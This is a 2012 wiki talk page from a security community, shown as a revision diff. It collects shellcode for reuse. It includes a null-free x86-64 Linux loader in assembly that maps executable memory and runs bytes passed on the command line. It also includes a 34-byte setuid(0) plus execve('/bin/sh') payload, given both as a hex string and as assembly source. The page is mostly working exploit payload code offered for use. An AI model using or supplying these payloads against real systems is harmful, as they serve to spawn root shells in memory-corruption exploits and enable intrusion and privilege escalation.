Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Category talk:Shellcode"

From NetSec
Jump to: navigation, search
(Shellcode loader)
(Shellcode loader)
Line 63: Line 63:
  
 
inject_finished:
 
inject_finished:
 +
inc %rsi
 +
movb $0xc3, (%rax, %rsi, 1)
 
  call *%rax
 
  call *%rax
  

Revision as of 21:37, 2 September 2012

Hey guys, thought we could use some collections of this stuff for re-use purposes. Lets only contribute things we wrote ourselves, no copy pasting others' codes please! Hatter 05:23, 19 August 2012 (MSK)

Collections

c3el4.png This page needs shellcodes, and will be updated with it shortly.

Thanks for your patience.

Windows

Linux

64-bit

Shellcode loader

You shouldn't need to use this algorithm as a buffer overflow payload, but it's null-free just in case. For 64-bit linux kernel 3 systems.

Usage:

  as inject.s -o inject.o ; ld inject.o -o inject
  ./inject "$(echo -en "\x90\x90\x90")"   
  • The above example will execute 3 no ops.
 
.section .data
.section .text
.globl _start
 
_start:
 pop %rbx  # argc
 pop %rbx  # arg0
 pop %rbx  # arg1 pointer
 
 
 push $0x9
 pop %rax
 
 xor %rdi, %rdi
 push %rdi
 pop %rsi
 inc %rsi
 shl $0x12, %rsi
 
 push $0x7
 pop %rdx
 push $0x22
 pop %r10
 
 push %rdi
 push %rdi
 pop %r8
 pop %r9
 
 syscall   # The syscall for the mmap().
 
begin_inject:
 xor %rsi, %rsi
 push %rsi
 pop %rdi    
 
inject_loop:
 cmpb %dil, (%rbx, %rsi, 1)
 je inject_finished
 mov (%rbx, %rsi, 1), %r10
 mov %r10, (%rax,%rsi,1)
 inc %rsi
 jmp inject_loop
 
inject_finished:
 inc %rsi 
 movb $0xc3, (%rax, %rsi, 1)
 call *%rax
 
exit:
 push $60
 pop %rax
 xor %rdi, %rdi
 syscall
 
setuid(0); execve('/bin/sh'); - 34 bytes

Hatter 05:27, 19 August 2012 (MSK)

  • \x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
 
.section .data
.section .text
.globl _start
_start:
 mov $0, %rdi
 mov $105, %rax
 syscall
 
# a function is f(%rdi,%rdx,%rsi)
 mov $59, %rax
                # execve(filename, argv, envp)
 push $0x00
 mov %rsp, %rdx # argv is null
 mov %rsp, %rsi # envp is null
 mov $0x0068732f6e69622f, %rcx
 push %rcx
 mov %rsp, %rdi # filename is '/bin/sh\0'
 syscall
 
 mov $60, %rax
 mov $0, %rdi
 syscall